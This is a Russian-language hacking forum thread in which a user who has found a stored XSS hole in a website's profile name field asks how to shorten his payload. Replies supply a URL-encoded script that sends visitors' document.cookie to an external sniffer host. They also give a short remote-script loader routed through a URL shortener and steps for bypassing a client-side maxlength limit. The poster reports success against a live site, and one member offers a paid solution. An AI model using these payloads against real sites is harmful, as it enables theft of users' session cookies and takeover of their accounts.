XSS Слишком длинный.

Discussion in 'Уязвимости' started by Groove, 29 Nov 2011.

  1. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    20
    Reputations:
    2
    Всем привет , у меня такой необычный вопрос , на одном сайте я нашел
    уязвимость , допустим я вставляю

    в поля (Имя)

    Все проходит успешно и при заходе на данный профиль мне пишет что уязвимость есть , теперь я хочу вставить следующий скрипт

    Но дело в том что при вставки данного xss в этом поле она не сохраняется , а причина тому слишком много символов , как я выяснил .

    Собственно вопрос : Как можно сделать короче (сократить, уменьшить )
    или зашифровать , но чтобы смысл данного скрипта оставался одним и тем же?

    Спасибо за внимание .
     
  2. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    Спрятать можно:
    HTML:
    %3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%73%6E%69%66%66%65%72%2E%78%61%6B%6E%65%74%2E%72%75%2F%73%6D%69%6C%65%73%2F%69%6D%67%5F%5F%31%30%31%30%2E%67%69%66%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
    Убери блокнотом(ctrl+h) все пробелы и в дело! ;)
     
  3. Fepsis

    Fepsis Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    803
    Likes Received:
    391
    Reputations:
    72
    <script type="text/javascript" src="http://твой_сайт/твой_скрипт.js"></script>
    возможно можно и без (type="text/javascript") не помню точно...

    а в твой_скрипт.js пиши что надо, ну типа
     
  4. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    20
    Reputations:
    2
    Не помогло. Мне нужно так чтобы за это [​IMG] поле , скрипт не вылазил.
     
  5. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    URL в студио вида si[это не я]te.ru/script.php?vuln_param="><script>alert('xss')</script>
     
  6. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    20
    Reputations:
    2
    Я тебя не понял :)
     
  7. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    Короче адрес уязвимого сайта давай =)

    TC скинул адрес, но ничего не написал, где уязвимость :eek:
     
    #7 tabletkO, 29 Nov 2011
    Last edited: 29 Nov 2011
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    853
    Reputations:
    857
    Руководство по пунктам.

    1) открываем Opera (именно оперу и никакой другой !!!) и переходим на выбранный сайт

    2) Жмём Правой кнопкой - Исходный код страницы

    3) Ищем нашу строку с вводом строки и меняем её длину

    maxlength="13" на maxlength="1300" к примеру

    4) Не выходя из редактирования исходного кода идёшь в левый верхний угол и ищешь там "Применить изменения", что собсно и жмёшь

    5) Переходишь на вкладку с сайтом и вбиваешь всю стоку полностью, без предыдущего ограничения.

    Если фильтра в php-коде нет, тебя пропустит
     
    _________________________
  9. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    20
    Reputations:
    2

    Большое спасибо , сейчас проверим .
     
  10. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    388
    Likes Received:
    169
    Reputations:
    65
    Если сервер рубит длину, то не поможет. Делается проще пареной репы же:

    1) делаем файл 1.js
    2) в него пишем img = new Image(); img.src = "http://sniffer.site.ru/blablabls.gif?"+document.cookie;
    3) заливаем куда угодно на любой хостинг, например на фрихост какой-нибудь
    4) идем на u.to, запихиваем туда ссылку на файл 1.js, получаем что-то типа http://u.to/abc123
    5) вставляем на сайте вот такой код:

    <script src="http://u.to/abc123"></script>

    Если нужно еще меньше, то пишем в асю 352223797 - скажу платное решение.
     
    1 person likes this.
  11. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    20
    Reputations:
    2
    Фильтр стоит , ничего не вышло (
     
  12. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    20
    Reputations:
    2
    Получилось , спасибо огромное .
     
  13. Fepsis

    Fepsis Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    803
    Likes Received:
    391
    Reputations:
    72
    Лол.. я тебе в четвёртом посте тоже самое посоветовал...

    Хотя это конечно моя вина, я забыл поставить циферки 1) 2) 3)
     
    3 people like this.
  14. Alexandr II

    Alexandr II -=ImperatoR=-

    Joined:
    28 Dec 2007
    Messages:
    1,073
    Likes Received:
    641
    Reputations:
    87
    не получишь ты плюсика от ТС(.... не переживай, всё ещё впереди
     
  15. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    20
    Reputations:
    2

    Я тебя там не понял ))) :D :D :D а тут все понятно ))
     
    1 person likes this.
  16. varex

    varex New Member

    Joined:
    6 Dec 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    подскажи

    как сделать 3 пункт добавь в аське
     
  17. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Ищешь в гугле:" Бесплатные хостинги с PHP или читай на нашем форуме...там есть раздел такой - большой раздел
     
    1 person likes this.
  18. Fepsis

    Fepsis Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    803
    Likes Received:
    391
    Reputations:
    72
    Там не нужен пхп =)
     
    1 person likes this.
  19. varex

    varex New Member

    Joined:
    6 Dec 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    пацаны плиз объясните в аське или в скайпе просто срочно надо но вот не допираю как скрипт разместить